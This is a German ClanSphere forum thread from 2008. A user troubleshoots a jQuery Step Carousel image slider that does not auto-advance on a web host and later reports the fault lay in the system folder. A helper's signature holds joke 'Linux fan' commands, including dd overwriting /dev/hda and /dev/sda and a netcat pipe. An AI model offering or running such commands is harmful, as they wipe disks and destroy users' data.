Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 2
Seite [1]
alexteam


Try to beat me




Beiträge: 186
# Thema - 11.11.2008 um 00:59 Uhr
Hallo Community!!

Ich habe mir gerade eine User Übersicht eingebaut mit einem Step Carousel Viewer!!

Hier der Link zum Step Carousel Viewer

Jetzt meine Frage: wenn ich die Datei local öffne funktioniert dieser auch und die Bilder wechseln automatisch.
Wenn ich ihn im Webspace hochlade und anschaue geht es nicht.
Ich kann zwar die Button Zurück und Vor benutzen aber die Automatk geht leider nicht.

Könnt Ihr mir da helfen??

Hier der Link zur Seite

Danke schon mal im Voraus!!

Hier ein Ausschnitt der htm

mehr... +-

<script type="text/javascript" src="http://alexander-gneuss.de/portal/clan/templates/design/facefiles/jquery-1.2.6.p ack.js"></script>
<script type="text/javascript" src="http://alexander-gneuss.de/portal/clan/templates/design/facefiles/stepcarousel.j s">
/***********************************************
* Step Carousel Viewer script- (c) Dynamic Drive DHTML code library (www.dynamicdrive.com)
* Visit http://www.dynamicDrive.com for hundreds of DHTML scripts
* This notice must stay intact for legal use
***********************************************/
</script>

<style type="text/css">
.stepcarousel{
position: relative; /*leave this value alone*/
border: 10px solid black;
overflow: scroll; /*leave this value alone*/
width: 280px; /*Width of Carousel Viewer itself*/
height: 100px; /*Height should enough to fit largest content's height*/
}
.stepcarousel .belt{
position: absolute; /*leave this value alone*/
left: 0;
top: 0;
}
.stepcarousel .panel{
float: left; /*leave this value alone*/
overflow: hidden; /*clip content that go outside dimensions of holding panel DIV*/
margin: 10px; /*margin around each panel*/
width: 280px; /*Width of each panel holding each content. If removed, widths should be individually defined on each content DIV then. */
}
</style>

<!--[if lte IE 7]>
<link href="css/patch/patch_sliding_door.css" rel="stylesheet" type="text/css" />
<![endif]-->
{googlemaps:head}</head>

<body onload="googlemaps_load()" onunload="googlemaps_unload()">
...
...
...
...
<div id="col1">
<div id="col1_content" class="clearfix">
<table border=5>
<td class="newshead" width="200" height="20">Control Center</td>
<td class="newshead" width="400" height="20">Überblick</td>
<tr>
<td class="bottom" width="200" height="20">{users:navlogin}</a></td>
<td class="bottom" width="400" height="20">
<ul id="countrytabs" class="shadetabs">
<li><a href="#" rel="country1" class="selected">Geburtstage</a></li>
<li><a href="#" rel="country2">User Online</a></li>
<li><a href="#" rel="country3">User Übersicht</a></li>
</ul>

<div style="border:1px solid gray; width:350px; margin-bottom: 1em; padding: 10px">

<div id="country1" class="tabcontent">
{users:navbirth}
</div>

<div id="country2" class="tabcontent">
{users:navonline}
</div>

<div id="country3" class="tabcontent">
<script type="text/javascript">
stepcarousel.setup({
galleryid: 'mygallery', //id of carousel DIV
beltclass: 'belt', //class of inner "belt" DIV containing all the panel DIVs
panelclass: 'panel', //class of panel DIVs each holding content
autostep: {enable:true, moveby:1, pause:300},
panelbehavior: {speed:500, wraparound:false, persist:true},
defaultbuttons: {enable: true, moveby: 1, leftnav: ['http://alexander-gneuss.de/portal/clan/templates/design/images/nav/arrowl.gif' , -5, 80], rightnav: ['http://alexander-gneuss.de/portal/clan/templates/design/images/nav/arrowr.gif' , -20, 80]},
statusvars: ['statusA', 'statusB', 'statusC'], //register 3 variables that contain current panel (start), current panel (last), and total panels
contenttype: ['inline'] //content setting ['inline'] or ['external', 'path_to_external_file']
&#125
</script>
<div id="mygallery" class="stepcarousel">
<div class="belt">
<div class="panel">
<a href="user.php?mod=users&amp;action=view&amp;id=1"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-1.png" width="80" height="80">
<a href="user.php?mod=users&amp;action=view&amp;id=2"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-2.jpg" width="80" height="80">
<a href="user.php?mod=users&amp;action=view&amp;id=4"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-4.gif" width="80" height="80">
</div>
<div class="panel">
<a href="user.php?mod=users&amp;action=view&amp;id=12"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-12.jpg" width="80" height="80">
<a href="user.php?mod=users&amp;action=view&amp;id=16"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-16.jpg" width="80" height="80">
<a href="user.php?mod=users&amp;action=view&amp;id=17"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-17.jpg" width="80" height="80">
</div>
<div class="panel">
<a href="user.php?mod=users&amp;action=view&amp;id=19"><img src="http://www.alexander-gneuss.de/portal/clan/uploads/users/picture-19.jpg" width="80" height="80">
</div>

</div>
</div>
<p>
<a href="javascript:stepcarousel.stepBy('mygallery', -1)">Zurück</a> <a href="javascript:stepcarousel.stepBy('mygallery', 1)" style="margin-left: 100px">Vorwärts</a><br />
<b>Current Panel:</b> <span id="statusA"></span> <b style="margin-left: 30px">Total Panels:</b> <span id="statusC"></span>
</p>

</div>
</div>
<script type="text/javascript">
var countries=new ddtabcontent("countrytabs")
countries.setpersist(true)
countries.setselectedClassTarget("link") //"link" or "linkparent"
countries.init()
</script>
</table>

Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 11.11.2008 um 02:35 Uhr
Sorry. Aber nach ca 5 Sekunden hatte ich nicht mehr wirklich Lust den Fehler zu Suchen.
Da ist so viel S*** eingebaut dass es kein wunder ist das es nicht geht.

Die vielen Javascripts, das Applet etc machen die Seite nicht gerade gut zum Surfen. Dazu kommt noch der wohl recht langsame Server.

Sorry. Aber mein Tipp:
check ob alle dateien richtig hochgeladen sind. Dateinamen und Speicherpfade noch mal checken dass sich nicht dort ein Fehler eingeschlichen hat.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
alexteam
Thread-Ersteller


Try to beat me




Beiträge: 186
# Antwort: 2 - 13.11.2008 um 12:50 Uhr
Fehler gefunden e lag nicht am Design sondern am Systemordner von Clansphere.
Kann also geschlossen werden.


Inaktiv
|

Dieses Thema wurde von Ramires ClanSphere Team PM geschlossen.

Antworten: 2
Seite [1]